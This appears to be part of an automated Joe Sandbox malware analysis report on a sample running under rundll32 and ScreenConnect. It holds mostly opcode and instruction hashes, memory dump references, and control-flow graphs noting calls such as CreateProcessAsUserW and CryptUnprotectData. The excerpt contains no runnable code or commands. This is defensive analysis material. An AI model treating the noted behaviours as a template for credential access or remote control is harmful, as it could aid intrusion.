• Instruction Fuzzy Hash: 3F217170A40205AFEB04DFA5D850ADE7BF6EFC8315F14402AD509A7391DA79AD46CB90
Memory Dump Source
• Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d797d03f4b880e57407616f4d9c1685bd63cb0e72927de147349376124042b2c
• Instruction ID: c4979d575688543d51d173aee589a8141442d29e39076cd295737afa7ec0c8e5
• Opcode Fuzzy Hash: d797d03f4b880e57407616f4d9c1685bd63cb0e72927de147349376124042b2c
• Instruction Fuzzy Hash: 9D212C75E102089FCB54DF69D8849DEBBB1FF8C714F10816AEA05AB361DB31A942CB90
Memory Dump Source
• Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 57c8bbabe5a2cd2ac0855ca32ba8f60b6e56df6f3c4578640a86fa458f620bf0
• Instruction ID: 64cf5c4a3ce7206d3f5736853cc9b9579cb189e53810b6d07d311b39fbd20212
• Opcode Fuzzy Hash: 57c8bbabe5a2cd2ac0855ca32ba8f60b6e56df6f3c4578640a86fa458f620bf0
• Instruction Fuzzy Hash: 43212E71A40104AFEB04DF95D891AEA7BA6EFC8324F14401AD909A7391CE797D46CBA0
Memory Dump Source
• Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d21b2ec76146474929158543d44a19fd69f09dc9a08176d83bf3f5060014315a
                                                                                              • Instruction ID: 54299111b91b5c3c67971a220cdbfe5e0f52beda5791aa8cfacb2704ededa55e
                                                                                              • Opcode Fuzzy Hash: d21b2ec76146474929158543d44a19fd69f09dc9a08176d83bf3f5060014315a
                                                                                              • Instruction Fuzzy Hash: 90016D723483404FD7129A69BCA04DAFFD5EBD627530540AFEE58CB203DF59A80793A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d00f74d0c60ca38854e46baaf02fa469b10ed7336c4047b1e4488084a041a34c
                                                                                              • Instruction ID: ed1d537d9c2168b4762c39c56ed29133bb0e351519a8cfd657a5ef5ebec968a1
                                                                                              • Opcode Fuzzy Hash: d00f74d0c60ca38854e46baaf02fa469b10ed7336c4047b1e4488084a041a34c
                                                                                              • Instruction Fuzzy Hash: 351106B17043058FDB12DB69EC9148EBFE5EB95268700846FE918CB302DF74AD079BA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a866528d11c3b4337182d5a5063ec650e104f0a0575fdb63b912106ed2fc8008
                                                                                              • Instruction ID: 2f580f1f4140988c22ac9513c72f9b7d78fca1bcf1024c2945908962164d356a
                                                                                              • Opcode Fuzzy Hash: a866528d11c3b4337182d5a5063ec650e104f0a0575fdb63b912106ed2fc8008
                                                                                              • Instruction Fuzzy Hash: 75110034A00205AFEB04DFA5D850A9E7BF6EFCC315F14802AD509A7391DE75AD45CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 105043478b04c9ef1cd6463633e1679bcbe0b4ad8314d74f9b88a3df20af3071
                                                                                              • Instruction ID: 0ac7453b9f0199344dbcdcc5bbfeadf2c2dd8625d2ef17bf4d90e8ea383704b7
                                                                                              • Opcode Fuzzy Hash: 105043478b04c9ef1cd6463633e1679bcbe0b4ad8314d74f9b88a3df20af3071
                                                                                              • Instruction Fuzzy Hash: DC112E35A00254AFEB04DFA4D455AE97FB2EFCC310F144019E90A97250CF796D45CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6af3ad85806f3c3d6e28754c6d8c2b60717be917a0604a4f6aa0cd0ee9804a77
                                                                                              • Instruction ID: aaac9af335974b64261693abc40f943d81b1e136fe2b8bc6c0cdb8eab796de8b
                                                                                              • Opcode Fuzzy Hash: 6af3ad85806f3c3d6e28754c6d8c2b60717be917a0604a4f6aa0cd0ee9804a77
                                                                                              • Instruction Fuzzy Hash: 72114F30A00204EFEB04DFA6D850AAA7BB6EFCC314F14401AD509A7391CF797D45CBA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5142abb10f8fa0a654255f59716d7e9c2c75391025ebe117b3d0614fd7eb0049
                                                                                              • Instruction ID: 47bdc2b56dfe834610b04ad95c921f5b4192253cae7d289ec04940e7ed1181e3
                                                                                              • Opcode Fuzzy Hash: 5142abb10f8fa0a654255f59716d7e9c2c75391025ebe117b3d0614fd7eb0049
                                                                                              • Instruction Fuzzy Hash: A0016536B001188BDF148AA9DC102EEB7F6FB8C315F04817AD505B7254DB7AA946C7A5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 151bf6dc4250f533969c2601d4fffbf104081906b0c8a98a2f6fb23d6c716c4b
                                                                                              • Instruction ID: d7ea779909245397d230bd49c7df09599b3ae9ee845be834e6ee5fd8611282f5
                                                                                              • Opcode Fuzzy Hash: 151bf6dc4250f533969c2601d4fffbf104081906b0c8a98a2f6fb23d6c716c4b
                                                                                              • Instruction Fuzzy Hash: 2F21F3B19042498EDB14DFAAC844AEEFBB0EF88324F10852ED959A7240C7746945CFA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0c794fc2b04448a400a478d6ffa8818d064079c0d7babd56a7a7b2b87cd5dd24
                                                                                              • Instruction ID: e203833c9666d914dfe06d9599b132bdc3e2c7c82fa14d125157ca8ce2bb2ee7
                                                                                              • Opcode Fuzzy Hash: 0c794fc2b04448a400a478d6ffa8818d064079c0d7babd56a7a7b2b87cd5dd24
                                                                                              • Instruction Fuzzy Hash: 1B01D631B0011887EF288B64CC542DEB7B2FF88314F1480BED105BB294DBBAA847C792
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 958ac23607661a19cc3947f737d4804139468ce749999c403b366f467807a12d
                                                                                              • Instruction ID: cd8b5a3031fb26bf432b57b679ee2cd858ddba00820ce2d5b1f5adf4dd128236
                                                                                              • Opcode Fuzzy Hash: 958ac23607661a19cc3947f737d4804139468ce749999c403b366f467807a12d
                                                                                              • Instruction Fuzzy Hash: 880171363402149F8B04DA6DE89486EF7AAFBC8264355807BFA05C7310CF32EC028794
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 132781cd3b09a9a18358ff8878c2093acdaffd37acc979935bec32d8136f56b5
                                                                                              • Instruction ID: c515c289624a88c7013e4f13986e7b1e2e308b08ebdeff93d314f99705a9dc4b
                                                                                              • Opcode Fuzzy Hash: 132781cd3b09a9a18358ff8878c2093acdaffd37acc979935bec32d8136f56b5
                                                                                              • Instruction Fuzzy Hash: 551106B1D042098FDB14DFAAC885ADEFBF4FF88324F10841AD559A7240CB746945CFA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9826db48e8b69c5e2c54363ee2c6fe842ea17b83f372b6fc56d4e0999a49919a
                                                                                              • Instruction ID: fe76d74aaa2e92e1df87b99d2b50538aeed63cbc14e527071bd93f8ea3faeecf
                                                                                              • Opcode Fuzzy Hash: 9826db48e8b69c5e2c54363ee2c6fe842ea17b83f372b6fc56d4e0999a49919a
                                                                                              • Instruction Fuzzy Hash: 1B01B5706093456FDF099F7458361663FE9DFC260470508ABD64ECF262E924DC0587D3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fe6b772228c3953d52f59814c17d4a92c7629d437171f61320dd80d4eec88ede
                                                                                              • Instruction ID: aa0a3126c4192aee71674f6e12a3a6c1cf660d20056de3ec73571cc4d57ba540
                                                                                              • Opcode Fuzzy Hash: fe6b772228c3953d52f59814c17d4a92c7629d437171f61320dd80d4eec88ede
                                                                                              • Instruction Fuzzy Hash: F611FB35A00215AFEB04DFA4D855AE9BFB6EFCC311F144019E50AE73A0DB796D45CBA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3127de2db7a593225e3bcfb5e51f33c9b0b1aeccbdb17744dcc4aa77d4404eb5
                                                                                              • Instruction ID: 5a59ab416873075469d7cf704ce2bb872db7576fa4e8a79509fe8e0de430dc2d
                                                                                              • Opcode Fuzzy Hash: 3127de2db7a593225e3bcfb5e51f33c9b0b1aeccbdb17744dcc4aa77d4404eb5
                                                                                              • Instruction Fuzzy Hash: 47019231B0010497EF18AB6A889479FBAE69BC9254F21802ED605AB391CF799D0787D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 71411204990a852b1e636811e90ba9479c9a395cc85769f44b5acf643c8882d8
                                                                                              • Instruction ID: 55e8c1e5d8b1b7c75150bfbd6d02dc98bed2ca6be31e59066530270203fbf5a1
                                                                                              • Opcode Fuzzy Hash: 71411204990a852b1e636811e90ba9479c9a395cc85769f44b5acf643c8882d8
                                                                                              • Instruction Fuzzy Hash: 2701DF31A10108E7FF18EA69CA557AF7ABA9BC8704F50802FD606E7381CE756D018B91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9547950c241587af1e704771d6a16c682fb8376578a5eb208d2a1e5f7a628dbc
                                                                                              • Instruction ID: 39c8fffe72198002e99aa284968619daca549a000237a989ef0d4ac7bb0f90ea
                                                                                              • Opcode Fuzzy Hash: 9547950c241587af1e704771d6a16c682fb8376578a5eb208d2a1e5f7a628dbc
                                                                                              • Instruction Fuzzy Hash: 80F07832B042309BFF1516A55C253BE67A3DBC0308F05816FC309AF7D6DA26B8438380
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.1799415116.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_44f0000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e9cf2290c034172f1db92e0026d0a4f723eab4a19972105f2845d928e1e02b4d
                                                                                              • Instruction ID: 81acfba2894354c44431c0c8b367ea6ab50f5c1316efc8ab6fa699ffa6bfe794
                                                                                              • Opcode Fuzzy Hash: e9cf2290c034172f1db92e0026d0a4f723eab4a19972105f2845d928e1e02b4d
                                                                                              • Instruction Fuzzy Hash: D0018431B0010887EF18AB7AC85479F7AE69FC9244F21846ED505A7391CF756D06CBD1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1800238941.000000000415D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0415D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_415d000_rundll32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:

Execution Graph

Execution Coverage: 12.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 4.1%
Total number of Nodes: 314
Total number of Limit Nodes: 21

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 211 58304ec-58317f2 213 58317f4-58317f7 211->213 214 58317fa-583185f CreateNamedPipeW 211->214 213->214 216 5831861-5831867 214->216 217 5831868-5831889 214->217 216->217
                                                                                              APIs
                                                                                              • CreateNamedPipeW.KERNEL32(00000000,00000001,00000008,?,?,?,00000001,00000004), ref: 0583184C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3055970038.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5830000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateNamedPipe
                                                                                              • String ID: 4L^q
                                                                                              • API String ID: 2489174969-616035646
                                                                                              • Opcode ID: 6775d26818f709db77b20f72583c9cd257fbff5ff1a8a7c89d115e9822079a4d
                                                                                              • Instruction ID: 66c44b77ec74b0e116fd3cb89d609b3fe938c7e55909484eabce465dbcf89532
                                                                                              • Opcode Fuzzy Hash: 6775d26818f709db77b20f72583c9cd257fbff5ff1a8a7c89d115e9822079a4d
                                                                                              • Instruction Fuzzy Hash: FB3102B59013489FCB10CF9AD888A8EBFF5FF48314F14C069E919AB221C775A855CFA0
                                                                                              APIs
                                                                                              • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 058302BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3055970038.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5830000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcessUser
                                                                                              • String ID:
                                                                                              • API String ID: 2217836671-0
                                                                                              • Opcode ID: 3d35371f7129352df485284fdc64675768197498221b988e70fcdb1f7dc88bb4
                                                                                              • Instruction ID: f6417705ca6d42ad1a5b8d2a36d9083a1342fe1f0f6edd1249fd93a3cb5948f1
                                                                                              • Opcode Fuzzy Hash: 3d35371f7129352df485284fdc64675768197498221b988e70fcdb1f7dc88bb4
                                                                                              • Instruction Fuzzy Hash: F7412172900209DFCF11CFA9C884ADEBBF2FF48310F14842AE918A7250D775AA55CFA0
                                                                                              APIs
                                                                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05BE2F4D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3057918338.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5be0000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CryptDataUnprotect
                                                                                              • String ID:
                                                                                              • API String ID: 834300711-0
                                                                                              • Opcode ID: 3d34d93e049a66fff9d43c96bc517103dd43107986db6fe67de9479e5f11dcac
                                                                                              • Instruction ID: 090f9948a60872cc3f736d0ac7d059f8792ad533dd346bdf986a56ab3005ead8
                                                                                              • Opcode Fuzzy Hash: 3d34d93e049a66fff9d43c96bc517103dd43107986db6fe67de9479e5f11dcac
                                                                                              • Instruction Fuzzy Hash: 7421C2769042098FDF14DF94C4487EEBBF1EF88310F28846ED505A7291CB799945DBA1
                                                                                              APIs
                                                                                              • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 040F176E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3048884900.00000000040F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_40f0000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CryptDataProtect
                                                                                              • String ID:
                                                                                              • API String ID: 3091777813-0
                                                                                              • Opcode ID: 9155fb59f12737f0158cfc10ff3e592840d8fab96361fca8b0197b619476dd7b
                                                                                              • Instruction ID: e10faad96a333b13889fb0b33384064b32e4c31a405d152868c8a82506c153a7
                                                                                              • Opcode Fuzzy Hash: 9155fb59f12737f0158cfc10ff3e592840d8fab96361fca8b0197b619476dd7b
                                                                                              • Instruction Fuzzy Hash: A12148B6800349DFCF10CF9AC844ADEBBF1FB88310F148429E919A7201C335A955DFA1
                                                                                              APIs
                                                                                              • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 040F176E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3048884900.00000000040F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_40f0000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CryptDataProtect
                                                                                              • String ID:
                                                                                              • API String ID: 3091777813-0
                                                                                              • Opcode ID: dab4f3847f8266123625dfd4df84c524e4c3ff1a220657842d6757f8a2f3a953
                                                                                              • Instruction ID: c4b9aace00e736d6660d38c3c3603bf1671a7d8249ef84727a43634e9ab43175
                                                                                              • Opcode Fuzzy Hash: dab4f3847f8266123625dfd4df84c524e4c3ff1a220657842d6757f8a2f3a953
                                                                                              • Instruction Fuzzy Hash: 8C2148B6800349DFCB10CF9AC844ADEBBF5FB48310F148429E919B7610D375A955DFA1
                                                                                              APIs
                                                                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05BE2F4D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3057918338.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5be0000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CryptDataUnprotect
                                                                                              • String ID:
                                                                                              • API String ID: 834300711-0
                                                                                              • Opcode ID: ba5cfe51fb5fe17f24f397b1047eededab1ee7e9ac380fc531d065328b26df9a
                                                                                              • Instruction ID: c8f0f83835bdc3beed3b36fc44a87dfb6205d0effdd228862f08d5b8250af2f2
                                                                                              • Opcode Fuzzy Hash: ba5cfe51fb5fe17f24f397b1047eededab1ee7e9ac380fc531d065328b26df9a
                                                                                              • Instruction Fuzzy Hash: 6D2164B6800209DFCF10CF89C845BEEBBF9EB48320F148459EA19A7211C339A954DFA1
                                                                                              APIs
                                                                                              • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05BE2F4D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3057918338.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5be0000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CryptDataUnprotect
                                                                                              • String ID:
                                                                                              • API String ID: 834300711-0
                                                                                              • Opcode ID: b5e25cc7dae0fc69a65c1db412cfa5f41c2f55ced6e8caa750a07ee957fbd4a6
                                                                                              • Instruction ID: 9c8c8a174e79cc2d741717714bcba5951830757aba8083997e65b1691664ed21
                                                                                              • Opcode Fuzzy Hash: b5e25cc7dae0fc69a65c1db412cfa5f41c2f55ced6e8caa750a07ee957fbd4a6
                                                                                              • Instruction Fuzzy Hash: 032167B6800249DFCF10CF99C844AEEBBF5FF48310F14845AE918A7211C339A555DFA1

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 134 5831688-583170e 143 5831710-5831712 134->143 144 5831719-5831725 134->144 143->144 146 5831730-5831732 144->146 147 5831727-583172e 144->147 149 5831740-5831768 146->149 147->146 148 5831734-583173b 147->148 150 583179a-58317f2 148->150 151 583173d 148->151 153 5831771 149->153 154 583176a-583176f 149->154 159 58317f4-58317f7 150->159 160 58317fa-583185f CreateNamedPipeW 150->160 151->149 156 5831776-583178b call 58304ec 153->156 154->156 161 5831790-5831797 156->161 159->160 163 5831861-5831867 160->163 164 5831868-5831889 160->164 163->164
                                                                                              APIs
                                                                                              • CreateNamedPipeW.KERNEL32(00000000,00000001,00000008,?,?,?,00000001,00000004), ref: 0583184C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3055970038.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5830000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateNamedPipe
                                                                                              • String ID: 4L^q$d/dq
                                                                                              • API String ID: 2489174969-3455392024
                                                                                              • Opcode ID: 5b40098e2456cd7fd267aeaee63e07328ba914682de94e80db3bfc91c830e59b
                                                                                              • Instruction ID: 50dd5fafd5648c0f66b5ce5375889f352f5e3908ba91acd129e8df94eec8545e
                                                                                              • Opcode Fuzzy Hash: 5b40098e2456cd7fd267aeaee63e07328ba914682de94e80db3bfc91c830e59b
                                                                                              • Instruction Fuzzy Hash: F2619F71A003089FCB14DFA9C845BAEBFF6FF88710F14806AE909EB291D7759905CB91

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 189 583f5d5-583f63c 191 583f690-583f713 CreateFileA 189->191 192 583f63e-583f663 189->192 201 583f715-583f71b 191->201 202 583f71c-583f75a 191->202 192->191 195 583f665-583f667 192->195 196 583f68a-583f68d 195->196 197 583f669-583f673 195->197 196->191 199 583f677-583f686 197->199 200 583f675 197->200 199->199 203 583f688 199->203 200->199 201->202 207 583f76a 202->207 208 583f75c-583f760 202->208 203->196 210 583f76b 207->210 208->207 209 583f762 208->209 209->207 210->210
                                                                                              APIs
                                                                                              • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0583F6FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3055970038.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5830000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID: 4L^q
                                                                                              • API String ID: 823142352-616035646
                                                                                              • Opcode ID: 530a7395a9eefd14389134c74390f8d08f42f1885e35d4cd205c79ca3930e628
                                                                                              • Instruction ID: 79679da9cd7014036b1f696f4e6ca95d6e79fd5a91f4ad2e3510a21bc9fe65f7
                                                                                              • Opcode Fuzzy Hash: 530a7395a9eefd14389134c74390f8d08f42f1885e35d4cd205c79ca3930e628
                                                                                              • Instruction Fuzzy Hash: 515145B1D003499FDB10CFA9C945B9EBBF2FB48304F248129E908EB2A1D7799845CF91

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 167 583da68-583f63c 169 583f690-583f713 CreateFileA 167->169 170 583f63e-583f663 167->170 179 583f715-583f71b 169->179 180 583f71c-583f75a 169->180 170->169 173 583f665-583f667 170->173 174 583f68a-583f68d 173->174 175 583f669-583f673 173->175 174->169 177 583f677-583f686 175->177 178 583f675 175->178 177->177 181 583f688 177->181 178->177 179->180 185 583f76a 180->185 186 583f75c-583f760 180->186 181->174 188 583f76b 185->188 186->185 187 583f762 186->187 187->185 188->188
                                                                                              APIs
                                                                                              • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0583F6FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3055970038.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5830000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID: 4L^q
                                                                                              • API String ID: 823142352-616035646
                                                                                              • Opcode ID: b9db6725a558560a732e8de3bd144b8efe1f5f60c8eb6ea296f6219c8a9cf5e9
                                                                                              • Instruction ID: 17aebe0080f97488f9ad691bd7f390ce78fb7491fd59ba9cccb352a3dec0da48
                                                                                              • Opcode Fuzzy Hash: b9db6725a558560a732e8de3bd144b8efe1f5f60c8eb6ea296f6219c8a9cf5e9
                                                                                              • Instruction Fuzzy Hash: 2B5135B1D003499FDB10CFA9C946B9EBBF2FB48304F248129E908EB261D7799845CF91

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 680 5be63e8-5be63fd 681 5be63ff-5be6402 680->681 682 5be6412-5be6419 680->682 683 5be64cc-5be64e0 681->683 684 5be6408-5be6411 681->684 685 5be641e-5be6462 call 5be5694 682->685 686 5be64a6-5be64af 683->686 687 5be64e2 683->687 703 5be6467-5be646c 685->703 690 5be650c-5be656e 686->690 691 5be64b1-5be64cb 686->691 688 5be64ee-5be64f7 687->688 694 5be657a-5be65b0 K32EnumProcesses 690->694 695 5be6570-5be6578 690->695 697 5be65b9-5be65e1 694->697 698 5be65b2-5be65b8 694->698 695->694 698->697 704 5be64f8-5be6505 703->704 705 5be6472-5be6475 703->705 704->690 706 5be6477-5be64a4 705->706 707 5be64e4-5be64e9 705->707 706->686 706->688 707->685
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3057918338.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_5be0000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
